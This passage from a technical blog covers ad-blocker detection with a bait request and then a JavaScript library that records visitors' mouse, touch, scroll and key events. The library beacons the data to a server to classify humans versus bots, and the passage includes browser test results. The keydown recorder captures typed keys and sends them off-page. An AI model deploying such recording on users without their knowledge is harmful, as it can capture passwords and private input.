<span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">badURL</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<p>After pasting the above snippet into the developer console, we see the error <strong>net::ERR_BLOCKED_BY_CLIENT</strong> which indicates that uBlock Origin
intercepted the request and aborted it. It can also be seen that the request took only 7.96ms, which is way too fast for a legit HTTP request.</p>
<figure>
<img src="https://incolumitas.com/images/uBlock-detected.png" alt="uBlock Origin detected" />
<figcaption>The extension uBlock Origin is being detected in Chrome</figcaption>
</figure>
<p>When using the above technique in production, several points need to be considered:</p>
<ol>
<li>Every time the above script is executed without active Adblock software, an HTTP request is made and a script is downloaded. This costs network bandwidth.</li>
<li>If the <code>badURL</code> is no longer a URL that is on the Adblock filter list, the technique ceases to work. Therefore, the validity of the <code>badURL</code> needs to be ensured.</li>
</ol>
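<p>One way to soften the first point is to run the detection only once per page load and reuse the result. The following is a minimal sketch under the assumption that the detection function returns a Promise; the helper name <code>createCachedDetector</code> is hypothetical and not part of any library.</p>

```javascript
// Wraps a detection function (assumed to return a Promise) so that the
// underlying network request is made at most once per page load.
function createCachedDetector(detect) {
  let cached = null;
  return function () {
    if (cached === null) {
      // First call: start the detection and remember the Promise.
      cached = detect();
    }
    // Later calls reuse the same Promise and trigger no new request.
    return cached;
  };
}
```

<p>Assuming a Promise-returning function such as <code>detectAdblock()</code> from above, <code>createCachedDetector(detectAdblock)</code> would return a function that can be called repeatedly without issuing additional requests.</p>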
<h3>The ultimate solution: Making a request to a non-existent baiting resource</h3>
<p>Assuming that most browsers do not have adblock software installed, we want a detection method that is fast and doesn't waste resources.
However, the solution presented above does waste unnecessary resources: On a browser without adblock, every time the function is executed, the browser loads the advertisement script.</p>
<p>One idea is to request a non-existent URL that adblock software reliably blocks. Without adblock software, the request merely returns a 404 error and no script is downloaded.</p>
<p>This is the ultimate adblock detection solution. You can paste it into your developer console and it should be able to detect any adblock software. It also falls back to <code>XMLHttpRequest</code> in case the <code>fetch()</code> API is not available.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Author: Nikolai Tschacher</span>
<span class="c1">// Date: 28.12.2020</span>
<span class="c1">// Website: https://incolumitas.com/</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectAdblockWithInvalidURL</span><span class="p">(</span><span class="nx">callback</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">flaggedURL</span> <span class="o">=</span> <span class="s1">'pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">fetch</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Request</span><span class="p">(</span><span class="nx">flaggedURL</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'HEAD'</span><span class="p">,</span>
<span class="nx">mode</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="p">});</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">request</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">response</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mf">404</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s1">'HEAD'</span><span class="p">,</span> <span class="nx">flaggedURL</span><span class="p">,</span> <span class="kc">false</span><span class="p">);</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mf">404</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">})(</span><span class="kd">function</span><span class="p">(</span><span class="nx">usingAdblock</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Using Adblocker: "</span> <span class="o">+</span> <span class="nx">usingAdblock</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
Behavioral Analysis: Recording Mouse Movements and other User Interactions with JavaScript
2020-12-24T16:53:00+01:00 2020-12-28T23:24:00+01:00
Nikolai Tschacher
tag:incolumitas.com,2020-12-24:/2020/12/24/recording-mouse-movements-with-javascript/
<p>In this blog post, I will introduce a JavaScript library that tracks various user interactions of website visitors. Several key problems that arise when creating a JavaScript analytics application will be discussed and solved in this blog post.</p>
<h3>Motivation</h3>
<p>Most JavaScript analytics applications aim to visualize and provide statistics of the browsing behavior of website visitors. This is not my motivation for recording and storing analytics data. Instead, I want to make a <em>simple</em> statement on the grounds of user interaction data:</p>
<ol>
<li>Whether the user interaction data seems to be of human nature</li>
<li>Or whether the data is generated by an automated program, a so-called bot or automated user agent</li>
</ol>
<p>Put differently, I want to <strong>classify user interaction data as either human or bot-like</strong>.</p>
<p>This is a very hard problem and there is no straightforward solution to it.</p>
<p>Currently, I am in the process of building a well-structured library that allows me to collect and store user interaction data for the next processing step. This technical topic will be the focus of this blog post.</p>
<p>Once enough data has been collected, I will have to design a system that classifies the data according to the above criteria. One possible solution would be to create a training set to feed a deep neural network. However, the training data must be pre-classified into the categories human or bot. This initial classification step could be quite a daunting task on its own.</p>
<p>Another problem is that it is actually not that simple to find a large sample of bot-generated interaction data, since a lot of bots do not create mouse or key-pressing events.</p>
<p>Only very sophisticated bots actually aim to mimic and replicate human behavior in the sense that their goal is to create user interaction events as a human would when they are browsing the web.</p>
<h3>ReCaptcha v2 and v3</h3>
<p>The standard method of telling humans apart from bots is Google's ReCaptcha system. In 2018, the new ReCaptcha v3 was introduced. The v2 version basically tasked the suspected user with a challenge that is hard to solve for computers, but relatively easy for humans.</p>
<p>The new v3 version is fully transparent and computes a continuous score between 0 (bot) and 1 (human) to rate all actions occurring on a website. This <a href="https://datadome.co/bot-detection/recaptchav2-recaptchav3-efficient-bot-protection/">blog post</a> gives an excellent overview of the subject.</p>
<p>Both ReCaptcha versions give a significantly better score to users that are using Google's Chrome browser and are logged into their Google account. If you delete your Google cookies, use Firefox and block third-party cookies, you will be faced with a significantly lower score.</p>
<p>The consequence of a low score can be twofold:</p>
<ol>
<li>You will get banned from using the website that is using Google ReCaptcha v3</li>
<li>You will have to solve an actual ReCaptcha v2 challenge to prove your humanness </li>
</ol>
<p>From Google's perspective, it makes perfect sense to sanction users that are not logged into one of the many Google services or are not using the Chrome browser. Owning a Google account proves a lot: that you are watching YouTube videos, writing emails with Gmail, or using your Android phone. All those apps verify on the side that you are a human.</p>
<p>The <strong>big BUT</strong> is obvious: </p>
<p>When there is no active usage history for you, you are automatically considered a second-class Internet citizen. This is very dangerous. The classification whether you are considered a human or a bot should be based on current data, not on past usage history.</p>
<p>In that sense, this essay makes an argument for instant bot classification based on behavioral analytics on your current session.</p>
<p>Worded differently, if you jump around like crazy and your keyboard is typing millions of words per second, you are probably a bot.</p>
<p>On the other hand, when you read a blog article <em>like this</em> very carefully and your mouse pointer is following each line in a smooth, human-like fashion, you probably are a human being.</p>
<h3>User Interaction Data</h3>
<p>So what kind of user interaction data should be recorded by the JavaScript library? Currently, the library captures the following user induced events:</p>
<ol>
<li><code>mousemove</code> Store the (x,y) coordinates of the current mouse cursor</li>
<li><code>mousedown</code> Store the (x,y) coordinates of a mouse left click</li>
<li><code>scroll</code> Store the <code>document.scrollingElement.scrollLeft</code> and <code>document.scrollingElement.scrollTop</code> variables when a scroll event happens</li>
<li><code>keydown</code> Store the currently pressed key code</li>
<li><code>resize</code> Fires when the viewport is resized. The new viewport size is stored</li>
<li><code>contextmenu</code> This event is fired when the user makes a right click with the mouse. The coordinates of the right click are stored</li>
<li><code>touchstart</code> Mobile touch event. This event is generated when the user taps on the screen</li>
<li><code>touchmove</code> Mobile touch event. This event arises when the user moves with their fingers across the touch screen</li>
<li><code>touchcancel</code> Mobile touch event. Fires when a touch event is canceled</li>
<li><code>touchend</code> Mobile touch event. Is fired when the finger is lifted from the touch screen</li>
</ol>
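<p>The event list above could be wired up roughly as follows. This is only a sketch and not the actual library code: the names <code>RECORDED_EVENTS</code> and <code>startRecording</code> as well as the shape of the stored records are assumptions made for illustration, and touch coordinates and scroll offsets are left out for brevity.</p>

```javascript
// Event names taken from the list above.
const RECORDED_EVENTS = [
  'mousemove', 'mousedown', 'scroll', 'keydown', 'resize',
  'contextmenu', 'touchstart', 'touchmove', 'touchcancel', 'touchend',
];

// Attaches one listener per event type to `target` (for example `window`)
// and appends a compact record to `log` whenever an event fires.
// `now` is an optional clock function, mainly useful for testing.
function startRecording(target, log, now) {
  const timestamp = now || (() => Date.now());
  const handlers = RECORDED_EVENTS.map((type) => {
    const handler = (event) => {
      const record = { type: type, time: timestamp() };
      // Mouse events expose clientX/clientY directly; other events do not.
      if (typeof event.clientX === 'number') {
        record.x = event.clientX;
        record.y = event.clientY;
      }
      if (type === 'keydown') {
        record.key = event.key;
      }
      log.push(record);
    };
    // Passive listeners never block scrolling or touch handling.
    target.addEventListener(type, handler, { passive: true });
    return { type: type, handler: handler };
  });
  // The returned function removes all listeners again.
  return function stopRecording() {
    handlers.forEach((entry) => {
      target.removeEventListener(entry.type, entry.handler);
    });
  };
}
```

<p>In a browser, calling <code>startRecording(window, [])</code> would start filling the given array; the returned function stops the recording again.</p>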
<h3>When to send behavioral analytics data to the server?</h3>
<p>One tricky problem with JavaScript analytics applications is the question of when and how to send the recorded data to the server. Obviously, one key requirement is to record user interaction data for as long as possible, up to the point when the user leaves the page.</p>
<p>If the recording of user interaction data stops too early, crucial data is missing for analysis. If we record for too long, it can become problematic to send the data to the server. Which event is suitable for this requirement? A couple of different events can be considered in this regard:</p>
<ol>
<li><code>beforeunload</code> Fired right before the window, the document and its resources are about to be unloaded. This is a cancelable event.</li>
<li><code>unload</code> Fires when the document or a child resource is being unloaded. This event is fired after the <code>beforeunload</code> and <code>pagehide</code> events. An error in the event handler will not stop the unloading workflow.</li>
<li><code>pagehide</code> event is sent to a Window when the browser hides the current page by presenting a different page from the session's history. When pressing the "back button", this event is fired.</li>
<li><code>visibilitychange</code> is fired when the content of a page has become visible or hidden.</li>
</ol>
<p>An excellent article named <a href="https://www.igvita.com/2015/11/20/dont-lose-user-and-app-state-use-page-visibility/">"Don't lose user and app state, use Page Visibility"</a> makes a case for the <code>visibilitychange</code> event. According to the article, no other event should be used to send analytics data to the remote server, especially because the other events fire unreliably.</p>
<h3>How to send the recorded data?</h3>
<p>The next question to be answered is how the recorded data should be transmitted to the remote server. There are several possibilities that come to mind:</p>
<ol>
<li>Use the good old <code>XMLHttpRequest</code> object to make HTTP requests (also called Ajax)</li>
<li>Use the relatively new <code>fetch()</code> HTTP API</li>
<li>Make use of an <code>&lt;img&gt;</code> tag and use the <code>src</code> attribute to transmit data in the query string</li>
<li>Use <code>navigator.sendBeacon()</code> to asynchronously send a small amount of data over HTTP to a web server</li>
</ol>
<p>The <code>navigator.sendBeacon()</code> API was introduced exactly for the purpose of asynchronously transmitting data before the page is closed. The mandatory reading for this topic is the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">related MDN page</a>.</p>
<blockquote>
<p>The navigator.sendBeacon() method asynchronously sends a small amount of data over HTTP to a web server. It’s intended to be used in combination with the visibilitychange event (but not with the unload and beforeunload events).</p>
</blockquote>
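<p>A sending function that prefers <code>navigator.sendBeacon()</code> and falls back to <code>fetch()</code> could look like the sketch below. The function name <code>sendRecordedData</code> and the optional <code>env</code> parameter are assumptions for illustration; <code>env</code> only exists so that the function can be tried outside a browser with stand-in objects.</p>

```javascript
// Sends `data` as a JSON string to `endpoint`. Returns true if the data
// was handed over to the browser, false if no transport was available.
function sendRecordedData(endpoint, data, env) {
  const scope = env || globalThis;
  const body = JSON.stringify(data);
  const nav = scope.navigator;
  if (nav && typeof nav.sendBeacon === 'function') {
    // sendBeacon() returns true if the browser queued the data.
    // A string body is transmitted as text/plain.
    return nav.sendBeacon(endpoint, body);
  }
  if (typeof scope.fetch === 'function') {
    // keepalive asks the browser to let the request outlive the page.
    scope.fetch(endpoint, { method: 'POST', body: body, keepalive: true })
      .catch(function () { /* nothing sensible to do while unloading */ });
    return true;
  }
  return false;
}
```

<p>In a browser, <code>sendRecordedData('http://localhost:8888/data', events)</code> would typically be called from a <code>visibilitychange</code> handler once the page becomes hidden.</p>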
<h4>Testing <code>sendBeacon()</code> behavior with different events</h4>
<p>In this section, the reliability of <code>sendBeacon()</code> is tested in combination with different events.</p>
<p>The following simple <code>express</code> server can be used to listen for incoming POST requests from <code>navigator.sendBeacon()</code>. </p>
<p>Install it with the command: </p>
<p><code>npm install express body-parser cors</code> </p>
<p>and then launch the server with: </p>
<p><code>node server.js</code>.</p>
<p>Let's assume the server is running on <code>http://localhost:8888</code> from now on.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// server.js</span>
<span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cors'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'path'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">express</span><span class="p">.</span><span class="nx">json</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">cors</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">text</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/data'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'ok'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div>
<p>The following code snippets are to be executed within the web page context. You can also paste them into the developer console directly.</p>
<p>First, let's see how the <code>visibilitychange</code> event is handled in JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">n</span><span class="o">++</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">message</span> <span class="o">=</span> <span class="s1">'visibilitychange - hidden - '</span> <span class="o">+</span> <span class="nx">n</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="s1">'http://localhost:8888/data'</span><span class="p">,</span> <span class="nx">message</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>A similar code snippet for the <code>beforeunload</code> event:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'beforeunload'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">n</span><span class="o">++</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">message</span> <span class="o">=</span> <span class="s1">'beforeunload - '</span> <span class="o">+</span> <span class="nx">n</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="s1">'http://localhost:8888/data'</span><span class="p">,</span> <span class="nx">message</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<p>The same logic applies to the <code>pagehide</code> and <code>unload</code> events; the corresponding snippets are omitted here for brevity.</p>
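<p>As a rough sketch of how the remaining events could be covered, the snippet below wraps the pattern from above in a small helper. The name <code>registerBeacon</code> and its <code>send</code> parameter are assumptions made for illustration; they are not part of the original test setup.</p>

```javascript
// Hypothetical helper (not from the original tests): attaches a listener for
// one lifecycle event and reports every occurrence through `send`.
function registerBeacon(target, eventName, send) {
  var n = 0;
  target.addEventListener(eventName, function () {
    n++;
    send('http://localhost:8888/data', eventName + ' - ' + n);
  });
}

// In a browser, wire the helper to navigator.sendBeacon().
if (typeof window !== 'undefined' && typeof navigator !== 'undefined' && navigator.sendBeacon) {
  var beacon = navigator.sendBeacon.bind(navigator);
  registerBeacon(window, 'pagehide', beacon);
  registerBeacon(window, 'unload', beacon);
}
```

<p>Passing the transmission function as a parameter keeps the helper independent of the browser, so a different transport could be swapped in for comparison.</p>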
<h4>Test Results for mobile and desktop browsers</h4>
<p>As the code snippets above demonstrate, we hook into an event from the page lifecycle and then attempt to send a small amount of data to our web server.</p>
<p>We consider the event to be a success if BOTH of the following points hold:</p>
<ol>
<li>The browser actually fired the event in question</li>
<li>The browser succeeded in sending the data with <code>navigator.sendBeacon()</code></li>
</ol>
<p>Therefore, it is possible that the browser fires the event but fails to deliver the payload data with <code>navigator.sendBeacon()</code>. This still counts as a failure, even if another transmission method might have succeeded.</p>
<p>The events above were tested on a desktop computer running <strong>Ubuntu 18.04.5 LTS</strong> and on an <strong>Android Phone Motorola g(6)</strong> running Android version 9. On both the desktop and the mobile platform, Firefox and Chrome were tested.</p>
<p>With Chrome and Firefox on the desktop computer (<strong>Ubuntu 18.04.5 LTS</strong>), the following results were obtained.</p>
<p>The symbol <strong>✓</strong> indicates that the payload data was successfully received by the Express server. The symbol <strong>✗</strong> indicates the opposite.</p>
<table>
<thead>
<tr>
<th>Event</th>
<th>Action</th>
<th>Desktop Chrome/86.0.4240.75</th>
<th>Desktop Firefox/84.0</th>
</tr>
</thead>
<tbody>
<tr>
<td>visibilitychange (hidden)</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close active Tab</td>
<td>✓ (event is triggered twice!)</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Switch Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close Browser</td>
<td>✓ (event is triggered twice!)</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>beforeunload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>unload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>unload</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>pagehide</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>pagehide</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
</tbody>
</table>
<p>It can be seen that the beacon is successfully received when using the <code>visibilitychange</code> event. The other events are neither ideal nor reliable for transmitting analytics data.</p>
<p>The following data was obtained on the <strong>Android Phone Motorola g(6)</strong>. The behavior of each event was tested with actions suited to mobile platforms.</p>
<table>
<thead>
<tr>
<th>Event</th>
<th>Action</th>
<th>Mobile Chrome/87.0.4280.101</th>
<th>Mobile Firefox/84.0</th>
</tr>
</thead>
<tbody>
<tr>
<td>visibilitychange (hidden)</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Press Home Button</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Open Task Management</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>beforeunload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>unload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close Tab</td>
<td>✗</td>
<td>✓</td>
</tr>
<tr>
<td>unload</td>
<td>Navigate away by clicking link</td>
<td>✗ (unreliable)</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>pagehide</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close Tab</td>
<td>✗ (unreliable)</td>
<td>✓</td>
</tr>
<tr>
<td>pagehide</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
</tbody>
</table>
<p>Again, on both mobile browsers, the <code>visibilitychange</code> event seems to be the only rational choice for sending analytics data to a remote server. The other events do not reliably deliver the beacon data.</p>
<h3>Analytics Algorithm</h3>
<p>Now that it has been established that it's best to consider the <code>visibilitychange</code> event, let's implement a simple algorithm that sends data to our remote server to collect the analytics data. The following JavaScript needs to be embedded in the <code><body></code> element.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// to be generated randomly by the server</span>
<span class="kd">var</span> <span class="nx">uuid</span> <span class="o">=</span> <span class="s1">'{random-uuid}'</span><span class="p">;</span>
<span class="c1">// base url </span>
<span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://example.org/path'</span><span class="p">;</span>
<span class="c1">// Instantiate an analytics object</span>
<span class="kd">var</span> <span class="nx">analytics</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Analytics</span><span class="p">();</span>
<span class="c1">// Start recording analytics data</span>
<span class="nx">analytics</span><span class="p">.</span><span class="nx">record</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">uuid</span><span class="o">:</span> <span class="nx">uuid</span><span class="p">,</span>
<span class="c1">// subsequent calls to getData() </span>
<span class="c1">// will yield newly generated analytics data only</span>
<span class="nx">data</span><span class="o">:</span> <span class="nx">analytics</span><span class="p">.</span><span class="nx">getData</span><span class="p">(),</span>
<span class="nx">href</span><span class="o">:</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">};</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">});</span>
</code></pre></div>
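<p>The snippet above relies on an <code>Analytics</code> object whose implementation is not shown in this article. A minimal sketch of what it could look like follows, assuming that only click coordinates are recorded. The <code>push()</code> method, the recorded fields and the optional <code>target</code> argument of <code>record()</code> are hypothetical. The definition has to be loaded before the snippet above runs.</p>

```javascript
// Hypothetical minimal Analytics object; the real implementation may differ.
function Analytics() {
  this.buffer = [];
}

// Append a single event to the internal buffer.
Analytics.prototype.push = function (type, detail) {
  this.buffer.push({ type: type, detail: detail, ts: Date.now() });
};

// Start recording. As an example, only click events are captured here.
// `target` defaults to the document and exists mainly to ease testing.
Analytics.prototype.record = function (target) {
  var self = this;
  target = target || document;
  target.addEventListener('click', function (event) {
    self.push('click', { x: event.clientX, y: event.clientY });
  });
};

// Return everything recorded since the previous call and reset the buffer,
// so that subsequent calls yield newly generated data only.
Analytics.prototype.getData = function () {
  var data = this.buffer;
  this.buffer = [];
  return data;
};
```

<p>Because <code>getData()</code> empties the buffer, every <code>visibilitychange</code> event that reports <code>hidden</code> transmits only the events recorded since the previous beacon.</p>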
<h3>What is the maximum payload size of <code>sendBeacon()</code>?</h3>
<p>The last question that needs to be answered: How much analytics data can we transmit at once with <code>sendBeacon()</code>?</p>
